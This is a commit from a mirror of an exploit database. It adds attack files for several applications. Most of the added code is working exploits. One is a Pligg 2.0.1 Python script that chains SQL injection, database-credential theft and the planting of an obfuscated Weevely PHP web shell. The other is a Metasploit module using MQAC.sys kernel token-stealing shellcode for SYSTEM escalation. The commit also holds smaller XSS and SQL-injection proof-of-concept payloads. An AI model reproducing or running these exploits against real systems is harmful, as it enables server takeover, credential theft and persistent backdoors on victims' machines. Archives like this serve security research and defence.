bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 07_27_2014

Browse source
This commit is contained in:
Offensive Security 2014-07-27 04:39:52 +00:00
parent 0cca3dcc6f
commit 5b2ba7c560
5 changed files with 396 additions and 44 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
files.csv
View file

@ -30772,3 +30772,6 @@ id,file,description,date,author,platform,type,port
34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0
34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow PoC",2014-07-24,HyP,linux,dos,0
34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 64bit - Stored XSS",2014-07-25,"Dolev Farhi",multiple,webapps,0
34166,platforms/php/webapps/34166.txt,"KubeSupport 'lang' Parameter SQL Injection Vulnerability",2010-06-18,"L0rd CrusAd3r",php,webapps,0
34167,platforms/win32/local/34167.rb,"MQAC.sys Arbitrary Write Privilege Escalation",2014-07-25,metasploit,win32,local,0
34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80

Can't render this file because it is too large.

55
platforms/multiple/webapps/34165.txt
View file

@ -1,22 +1,12 @@
# Exploit Title: Stored XSS vulnerability in Zenoss core open source
monitoring system
# Exploit Title: Stored XSS vulnerability in Zenoss core open source monitoring system
# Date: 12/05/2014
# Exploit author: Dolev Farhi dolev(at)openflare.org
# Vendor homepage: http://zenoss.com
# Software Link: http://www.zenoss.com
# Version: Core 4.2.5-2108 64bit
# Tested on: Kali Linux
# Vendor alerted: 12/05/2014
# CVE-2014-3738
# CVE-2014-3738
Software details:
@ -49,42 +39,19 @@ executed immediately.
Proof of Concept:
1. Create a device with with the Title <script>alert("XSS")</script>
2. Navigate to the Infrastructure -> Manufacturers page.
3. pick the name of the manufacturer of the device, e.g. Intel
4. select the type of the hardware the device is assigned to, e.g. GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz
5. the XSS Executes.
1. Create a device with with the Title
<script>alert("XSS")</script>
<tr class="even">
<td class="tablevalues"><a href='/zport/dmd/Devices/Server/Linux/devices/localhost/devicedetail'><script>alert("Dolev")</script></a></td>
<td class="tablevalues">GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz</td>
2. Navigate to the Infrastructure -> Manufacturers
page.
3. pick the name of the manufacturer of the device, e.g.
Intel
4. select the type of the hardware the device is
assigned to, e.g. GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz
5. the XSS Executes.
<tr class="even">
<td class="tablevalues"><a
href='/zport/dmd/Devices/Server/Linux/devices/localhost/devicedetail'><script>alert("Dolev")</script></a></td>
<td class="tablevalues">GenuineIntel_ Intel(R) Core(TM)
i7-2640M CPU _ 2.80GHz</td>
</tr>
</tr>

7
platforms/php/webapps/34166.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40970/info
KubeSupport is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/KubeSupport/install/index.php?lang=[SQLI]

172
platforms/php/webapps/34168.py Executable file
View file

@ -0,0 +1,172 @@
#!/usr/bin/python
#
#
# Exploit Title: Pligg <= 2.0.1 SQL Injection / PWD disclosure / RCE
# Author: BlackHawk
# For base python code,
# thanks to my fiend: The:Paradox
# Disclosure date: 24/07/2014
# Software Link: http://www.pligg.com/
#
# To Elena, thank you for the time spent.
#
#
"""
######### 1. SQLInjection / User passord change #########
Let's get some details, vuln it's pretty obvious , look at recover.php source:
File: recover.php
----------------------------------------------------------
29. $id=$_REQUEST['id'];
30. $n=$_REQUEST['n'];
31. $username=base64_decode($id);
32 $sql="SELECT * FROM `" . table_users . "` where `user_login` = '".$username."' AND `last_reset_request` = FROM_UNIXTIME('".$n."') AND user_level!='Spammer'";
[...]
61. $to = $user->user_email;
62. $subject = $main_smarty->get_config_vars("PLIGG_Visual_Name").' '.$main_smarty->get_config_vars("PLIGG_PassEmail_Subject");
63.
64. $body = sprintf(
65. $main_smarty->get_config_vars("PLIGG_PassEmail_PassBody"),
66. $main_smarty->get_config_vars("PLIGG_Visual_Name"),
67. $my_base_url . $my_pligg_base . '/login.php',
68. $user->user_login,
69. $password
70. );
71.
72. $headers = 'From: ' . $main_smarty->get_config_vars("PLIGG_PassEmail_From") . "\r\n";
73. $headers .= "Content-type: text/html; charset=utf-8\r\n";
74.
75. if (!mail($to, $subject, $body, $headers))
76. {
77. $saltedPass = generateHash($password);
78. $db->query('UPDATE `' . table_users . "` SET `user_pass` = '$saltedPass' WHERE `user_login` = '".$user->user_login."'");
79. $db->query('UPDATE `' . table_users . '` SET `last_reset_request` = FROM_UNIXTIME('.time().') WHERE `user_login` = "'.$user->user_login.'"');
80.
81. $current_user->Authenticate($user->user_login, $password);
[...]
----------------------------------------------------------
Thanks to the base64_decode there are no problems of magic_quotes or whatever, but as an mail must be sent for the password to be reset, you have to totally take control of the query so no sospicious notifications will be sent.
To prevent sending clear data & quotes with the request, I'll not use $n variable, resulting in a longer and less fancy SQLInj.
Now that we are admin we use our power to:
[+] get database data from dbsettings.php
[+] plant some code to upload a post-exploitation Weevely shell
Code it's very dirty but works :)
"""
import urllib, urllib2, base64, re
from time import sleep
from sys import argv
from cookielib import CookieJar
print """
#=================================================================#
# Pligg <= 2.0.1 #
# Sqli / Source leak / RCE #
# Priviledge Escalation Exploit #
# #
# #
# _____ _ _____ #
# (___ \( )/ ___) #
# (___ | | ___) #
# /"| ("\ Experientia senum, #
# ( (| |) ) agilitas iuvenum. #
# `.!' .' #
# / .'\ Adversa fortiter. #
# \|/ / Dubia prudenter. #
# /.< #
# (| |) #
# | ' #
# `-' VK #
# #
#=================================================================#
# Usage: #
# ./Exploit [Target] [Path] [Username] #
# #
# Example: #
# ./Exploit 127.0.0.1 /pligg/ #
# ./Exploit www.host.com / #
#=================================================================#
# email: hawkgotyou[at]gmail[dot]com BlackHawk #
#=================================================================#
"""
if len(argv) <= 3: exit()
port = 80
target = argv[1]
path = argv[2]
uname = argv[3]
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
formdata = {"reg_password" : "random",
"reg_password2" : "random",
"n" : "123",
"processrecover" : "1",
"id" : base64.b64encode(b"mrcongiuntivo' UNION SELECT 1,(SELECT user_login FROM pligg_users WHERE user_level='admin' LIMIT 1),3,4,5,6,'sodoma@mailinator.com',8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 UNION SELECT 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 FROM pligg_users WHERE user_login = 'warum")
}
data_encoded = urllib.urlencode(formdata)
print "[+] Sending the reset password request for user "+ uname
response = opener.open("http://" + target + path +"recover.php", data_encoded)
content = response.read()
print "[+] Heading to admin panel and activating anti-spam"
response = opener.open("http://" + target + path +"admin/admin_config.php?action=save&var_id=12&var_value=true")
content = response.read()
print "[+] Setting a new blacklist file"
response = opener.open("http://" + target + path +"admin/admin_config.php?action=save&var_id=14&var_value=libs/dbconnect.php")
content = response.read()
print "[+] Retrieving DB connection details"
response = opener.open("http://" + target + path +"admin/domain_management.php")
content = response.read()
regex = re.compile("define\(\"([A-Z_]+?)\", '(.*?)'\)")
print regex.findall(content)
print "[+] Preparing dbconnection.php for shell injection.."
response = opener.open("http://" + target + path +"admin/domain_management.php?id=0&list=blacklist&remove=?%3E")
content = response.read()
print "[+] Time for some shell planting, preparing file_put_contents.."
seed = "IF(ISSET($_GET[WHR])){FILE_PUT_CONTENTS(STRIPSLASHES($_GET[WHR]),STRIPSLASHES($_GET[WHT]), FILE_APPEND);}CHMOD($_GET[WHR],0777);"
response = opener.open("http://" + target + path +"admin/domain_management.php?id=&doblacklist="+seed)
content = response.read()
print "[+] Injecting weevely.php [ https://github.com/epinna/Weevely/ ] with pwd: peekaboo"
weevely = """
<?php /**/
$ozyv="XBsYWNlKGFycmF5KCcvW15cdz1czrc10vJywnL1xzLycpLCBhcnJheSgnzrJyzrwnKycpLzrCBq";
$lphb="b2luKGFzrycmF5X3NsaWzrNlKzrCRhLCRjKCRhKS0zKSkpKzrSzrk7ZzrWNobyAzrnPCzr8nLiRrLiczr+Jzt9";
$jrtc="JGM9J2NvzrdW50JzskYT0kX0NPT0tJRTtpZihyZzrXNldCgkYSk9PSdwZScgJiYgzrJGMzroJGEpPjMpzreyRr";
$xxhr=str_replace("h","","shthrh_hrehphlahche");
$yuwd="PSdla2Fib28zrnzrO2zrVjaG8gJzwnLiRrLic+JztldmFzrsKGzrJhc2U2NF9kZWNvZGUocHJlZ19yZ";
$bzrj=$xxhr("oo","","booaoosooeoo6oo4_dooeoocooooodooe");
$atkr=$xxhr("b","","cbrebatbeb_bfbunbctbion");
$ajbi=$atkr("",$bzrj($xxhr("zr","",$jrtc.$yuwd.$ozyv.$lphb)));$ajbi();
?>"""
for wl in weevely.splitlines():
formdata = {"WHR" : "weevely.php",
"WHT" : wl
}
data_encoded = urllib.urlencode(formdata)
response = opener.open("http://" + target + path +"admin/admin_delete_comments.php?"+data_encoded)
content = response.read()
sleep(4)
print "[+] Cleaning up the seeder.."
response = opener.open("http://" + target + path +"admin/domain_management.php?id=0&list=blacklist&remove="+seed)
content = response.read()
print "[+] Resetting the blacklist file.."
response = opener.open("http://" + target + path +"admin/admin_config.php?action=save&var_id=14&var_value=logs/domain-blacklist.log")
content = response.read()
print """
#=================================================================#
Shell is [ http://"""+host+path+"""/admin/weevely.php ]
#=================================================================#
Access is via Weevely Python script
"""

203
platforms/win32/local/34167.rb Executable file
View file

@ -0,0 +1,203 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info={})
super(update_info(info, {
'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
'Description' => %q{
A vulnerability within the MQAC.sys module allows an attacker to
overwrite an arbitrary location in kernel memory.
This module will elevate itself to SYSTEM, then inject the payload
into another SYSTEM process.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt Bergin', # original exploit and all the hard work
'Spencer McIntyre' # MSF module
],
'Arch' => [ ARCH_X86 ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows XP SP3',
{
'_KPROCESS' => "\x44",
'_TOKEN' => "\xc8",
'_UPID' => "\x84",
'_APLINKS' => "\x88"
}
],
],
'References' =>
[
[ 'CVE', '2014-4971' ],
[ 'EDB', '34112' ],
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
],
'DisclosureDate'=> 'Jul 22 2014',
'DefaultTarget' => 0
}))
end
def find_sys_base(drvname)
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0..results['return'] - 1]
if drvname == nil
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
end
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
return [address, current_drvname]
end
end
end
# Function borrowed from smart_hashdump
def get_system_proc
# Make sure you got the correct SYSTEM Account Name no matter the OS Language
local_sys = resolve_sid("S-1-5-18")
system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
this_pid = session.sys.process.getpid
# Processes that can Blue Screen a host if migrated in to
dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
session.sys.process.processes.each do |p|
# Check we are not migrating to a process that can BSOD the host
next if dangerous_processes.include?(p["name"])
next if p["pid"] == this_pid
next if p["pid"] == 4
next if p["user"] != system_account_name
return p
end
end
def open_device
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
if handle['return'] == 0
print_error('Failed to open the \\\\.\\MQAC device')
return nil
end
handle = handle['return']
end
def check
handle = open_device
if handle.nil?
return Exploit::CheckCode::Safe
end
session.railgun.kernel32.CloseHandle(handle)
os = sysinfo["OS"]
case os
when /windows xp.*service pack 3/i
return Exploit::CheckCode::Appears
when /windows xp/i
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
if sysinfo["Architecture"] =~ /wow64/i
print_error("Running against WOW64 is not supported")
return
elsif sysinfo["Architecture"] =~ /x64/
print_error("Running against 64-bit systems is not supported")
return
end
if is_system?
print_error("This meterpreter session is already running as SYSTEM")
return
end
kernel_info = find_sys_base(nil)
base_addr = 0xffff
print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
handle = open_device
return if handle.nil?
this_proc = session.sys.process.open
unless this_proc.memory.writable?(base_addr)
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
end
unless this_proc.memory.writable?(base_addr)
print_error('Failed to properly allocate memory')
this_proc.close
return
end
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
hKernel = hKernel['return']
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
halDispatchTable = halDispatchTable['return']
halDispatchTable -= hKernel
halDispatchTable += kernel_info[0]
print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
tokenstealing = "\x52" # push edx # Save edx on the stack
tokenstealing << "\x53" # push ebx # Save ebx on the stack
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
tokenstealing << "\x8b\xc8" # mov ecx, eax
tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
tokenstealing << "\x75\xe8" # jne 0000101e ======================
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
tokenstealing << "\x5b" # pop ebx # Restores ebx
tokenstealing << "\x5a" # pop edx # Restores edx
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
shellcode = make_nops(0x200) + tokenstealing
this_proc.memory.write(0x1, shellcode)
this_proc.close
print_status("Triggering vulnerable IOCTL")
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
unless is_system?
print_error("Exploit failed")
return
end
proc = get_system_proc
print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
unless execute_shellcode(payload.encoded, nil, proc['pid'])
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end